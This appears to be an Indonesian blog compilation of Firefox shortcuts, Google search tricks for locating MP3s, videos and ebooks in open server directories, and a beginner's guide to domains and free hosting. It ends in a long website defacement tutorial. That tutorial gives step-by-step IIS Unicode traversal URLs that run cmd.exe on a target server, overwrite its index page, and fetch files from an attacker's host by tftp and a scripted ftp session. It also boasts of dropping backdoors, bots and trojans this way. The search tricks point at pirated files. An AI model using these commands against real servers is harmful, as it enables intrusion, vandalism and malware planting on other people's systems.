Find Again : F3
Find as You Type Link : '
Find as You Type Text : /
Find in This Page : Ctrl + F
Find Previous : Shift + F3

SHORTCUT UNTUK MOUSE

Back : Shift + Scroll Down
Forward : Shift + Scroll Up
Buka Link di Background Tab : Ctrl + Klik Kiri atau Klik Tengah
Buka Link di Foreground Tab : Ctrl + Shift + Klik Kiri
Buka Link di New Window : Shift + Klik Kiri
Scroll Line by Line : Alt + Scroll
Tab Close : Klik pada tengah2 Tab
Tab Baru : Double Klick pada Tab Bar
Memperbesar Ukuran Teks : Ctrl + Scroll UP
Memperbesar Ukuran Teks : Ctrl + Scroll Down

LOKASI FILE-FILE PENTING FIREFOX

Cached Elements
C:\Documents and Settings\[username]\Local Settings\Application Data\Mozilla\Firefox\Profiles\[profilename]\Cache\
Profile Manager
Close Firefox. From the "Start" menu, select "Run", type "firefox.exe -p"
User Profile Folder
C:\Documents and Settings\[username]\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default\
Advanced Configuration
Ketik di AddressBar : about:config
Cache Info
Ketik di AddressBar : about:cache
Plugin Info
Ketik di AddressBar : about:plugins

TIPS DAN TRIK

Block Popup Windows
Tools -> Options -> Web Features
Customize Toolbars
Klik kanan pada toolbar dan pilih customize toolbar. Untuk nambah icon di toolbar, drag and drop aja icon yang mau ditaro ke toolbar.
Desktop Shortcut to Current Page
Drag icon pada Addressbar, lalu taruh di Desktop
Make Firefox Default Browser
Tools -> Options -> General -> Set Firefox As Default Browser
Manage Cache, Cookies, History and Passwords
Tools -> Options -> Privacy
Set Home Page
Tools -> Options -> General -> Home Page
Tabbed Browsing Options
Tools -> Options -> Advanced -> Tabbed Browsing

Mencari Video dan MP3

ketik tulisan di bawah buat nyari video :

allinurl: +(avi|mpg|3gp|wmv|rm) judulvideo [k-lo judul tinggal pintar-pintar kita mencoba]

Nyari MP3 neh langkah-langkah nya :

# Buka Google
# Masukkan query berikut ke dalam kotak pencarian.
?intitle:index.of? mp3 [artist] [title]
Ubah [artist] dengan nama artis/band/penyanyi yg Anda cari
Ubah [title] dengan judul lagu yg Anda cari.
Contoh:
?intitle:index.of? mp3 coldplay
?intitle:index.of? mp3 “simple plan”
?intitle:index.of? mp3 “simple plan” untitled
?intitle:index.of? mp3 “welcome to my life”

cari buku 2

Mencari buku dengan judul tertentu

Coba masukin Kata kunci ini:

allinurl: +(rar|chm|zip|pdf|tgz) Judulbuku

Semoga membantu :P

cari buku

Gue mau sharing salah satu kehebatan Google.
Google bisa nyari apa aja di dunia internet. Tinggal kita masukin kata kunci yang tepat aja.

Disini gue akan ajarkan gimana cari eBook di google.

Coba masukin Kata kunci ini:

+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +apache
Kode diatas untuk mencari directory dari server apache yang mengandung/berisi ekstensi chm|pdf|zip|rar



Mencari buku dengan judul tertentu

Coba masukin Kata kunci ini:

allinurl: +(rar|chm|zip|pdf|tgz) Judulbuku

Membuat Website

Cara membuat Websites / Situs

Sudah banyak sebenarnya web sites yang mengulas tentang pembuatan situs/web sites. Akan tetapi Kami akan coba mengulas tentang pembuatan suatu situs memberikan beberapa gambaran langkah membuat suatu situs dalam bahasa yang mudah dimengerti terutama bagi pemula yang masih belum begitu paham soal pembuatan situs ini.

Hal-hal mendasar yang harus dimiliki dalam membuat situs / web sites :

1. Mempunyai Domain

2. Mempunyai web hosting.

3. File html, htm atau front page, php maupun script CMS.

Definisi atau penjelasan dari istilah diatas :

1. Domain

Domain adalah nama situs kamu yang selanjutnya menjadi identitas situs kamu yaitu yaitu nama situs kamu misal www.esc-creation.com atau www.domain-kamu.net dan sebagainya . Untuk memiliki nama domain kamu bisa mendaftarkan di situs penyedia layanan domain yang banyak sekali situs yang menyediakan layanan tersebut. Banyak pihan / alternatif nama yang bisa anda miliki domain kamu . com .net .org .info .org .us .cn .tk dan masih banyak lagi. Harganya juga bervariasi dari kisaran 2 ribu sampai 250 ribuan untuk pendaftaran layanan domain selama 1 tahun.

2. Web Hosting

WebHosting adalah penyedia layanan hosting / server dimana anda akan meletakan data data dari situs kita untuk selanjutnya web hosting tersebut harus meng - on- line kan data anda terus menerus selama 24 jam agar pengunjung dapat mengakses situs anda setiap saat. Untuk mempunyai sebuah server tersebut boleh di bilang adalah sangat mahal karena membutuhkan perangkat yang lumayan banyak dan serba canggih.

Karena faktor tersebut alternatifnya adalah kita menyewa jasa layanan web hosting yang dari segi ekonomis nya lebih murah dan lebih mudah penggunaanya. Anda bisa mendapatkan jasa layanan tersebut di berbagai penyedia layanan layanan web hosting. Harganyapun bermasam macam mulai dari 5000 sampai jutaan rupiah per tahunya ergantung dari kebutuhan atau paket hostingan yang ingin anda miliki. Dimana yang membedakan adalah diantaranya bandwidth, akses speed, bandwidth limit email, sub domain , domain parking fantastico instaler, tempat server di indonesia / luar negeri itu juga berpengaruh pada harga karena berpengaruh pada kecepatan akses internet dan berbagai fasilitas yang beragam yang tentunya berpengaruh juga pada harga sewa web hosting.

3. File Web html, htm, Front page, Php atau script CMS

Membuat File html, htm atau front page, php, dan lain lain adalah file kita yang nantinya akan kita taruh di web hosting dan selanjutnya oleh server webhosting akan di publish kan ke jaringan internet agar bisa di akses oleh pengguna internet di seluruh dunia. File tersebut bisa anda buat dengan berbagai macam software pembuat file web, diantaranya microsoft front page, web publisher, macromedia dream weaver, cms dan sebagainya.

Ada 2 macam perbedaan mendasar dari program pembuatan web / situs yaitu :

1. Pembuatan file secara of line biasanya memakai program microsoft front page, publisher, macromedia dream weaver dan lain lain. Jadi kita membuat file tersebut secara off line yaitu dalam proses pembuatan file tersebut tanpa harus ada koneksi internet, yang kemudian setelah jadi di upload ke web hosting dan selanjutnya di publishkan oleh server web hosting.

2. Pembuatan file web secara online yang lebih dikenal dengan system CMS ( Content Management System ) System ini sekarang lebih populer dan banyak dipake untuk saat ini karen lebih flkesible dan lebih mudah dalam pemeliharaan atau cepat proses editingnya. Akan tetapi dalm prosesnya komputer kit harus terhubung dengan internet. Beberapa Script atau Sofware yang umum dan populer dipake diantaranya wordpress, jomlaa, bamboo, soso, PHP fusion dan masih banyak lagi. Salah satu cara mengelola CMS yaitu Wordpress ada di sini, dan bisa praktek menggunakannya di sini

Untuk postingan mendatang kami akan berikan tuntunan / cara belajar membuat situs dengan memanfaatkan jasa layanan domain gratis dan jasa layanan web hosting gratis . ya lumayan untuk sekedar belajar… Mumpung ada yang ada menyediakan fasilitas itu untuk kita.

Anda bisa mencobanya dulu dengan mendaftarkan nama domain gratis tis… tanpa biaya sepeserpun. kamu klik di sini bagian banner co.cc free domain full DNS management segera dapatkan dapatkan nama domain untuk praktek .

CO.CC:Free Domain

Daftarkan juga domain kamu ke penyedia web hosting gratis klik disini atau banner dibawah ini klik banner free web hosting. Dijamin semuanya gratis tanpa biaya apapun cukup dafarkan menggunakan email anda.. Silahkan mencoba.. dan belajar bersama ESC creation dot com.

Free Web Hosting with Website Builder

Atau anda juga bisa menggunakan layanan Webhosting Gratis Indonesia dari ESC-webhosting, Webhosting Gratis dari esc-creation dot com dapatkan Hosting Gratis with cpanel vista, Pendaftaran cukup mudah dengan dilengkapi Fasilitas Cpanel, fantastico Auto installer, For ready Installer CMS Wordpress, Joomla, Forum free domain co.cc dan banyak lagi fasilitas lengkap dari Hosting Gratis ESC ini.

www.esc-webhosting.co.cc

Webhosting Gratis Indonesia Full Fasilitas Cpanel Fantastico Auto Installer

Webhosting Gratis Indonesia Full Fasilitas Cpanel Fantastico Auto Installer

1. Fitur ESC webhosting Hosting Gratis Indonesia
2. Tutorial setup dan pendaftaran Hosting ESC-webhosting
3. Tutorial Lanjutan Pembuatan Situs gratis menggunakan Domain co.cc dan 000webhost
4. Dan Tutorial Setup 000webhost

DEFACE WEB

Tutorial Unicode By Jangkr|k/Ga|b ( Crew Of MinangCrew, Hackermuda, Makassarhack, K-elektronik, Deface-team, Padanghacking, Indohack, Aritechdev, Neoteker, Indoprovider, Validcc, Medanhacking ...etc)
Os Target Windows Nt /9x
Ini HendakNya Dijadikan Bahan Percobaan yang Bermanfaat Yach
DediCated Toturial To : Pepole On irc.dal.net
chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team, #Makassarhack, #Indohack
#IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking, #Aritechdev,#Neoteker ...etc
__________________________________________________ __________


1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.target.com

2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set

maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot

c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

/c+dir+c: menjadi /c+copy+c:

lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe

sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm

sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak

f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm

/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

b.)Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya

c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

Kira Nya path nya di c:inetpubwwwroot

d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah


Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........

untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary


Catatan :
- Daftar Pustaka
.) Tutorial R3VOLT Anggota #Medanhacking
.) Tutorial Pak_Tani Anggota #Cracxer
.) Tutoriaal Dis0RdeR Anggota #Medanhacking
.) Tutorial Rio_Martin Anggota #IndoSnifing

- Revisi Dan Tambahan Serta edit Dari Janngkr|k
- Kalau Mau Download Software IIS Scaner Di Web Site
. WWW.ElHACKER.NET
. WWW.KEBAM.NET
- Jangan Jadi Cracker Yang merusak kerja nya

Thankyou to all my friend that give an article
Christopher.S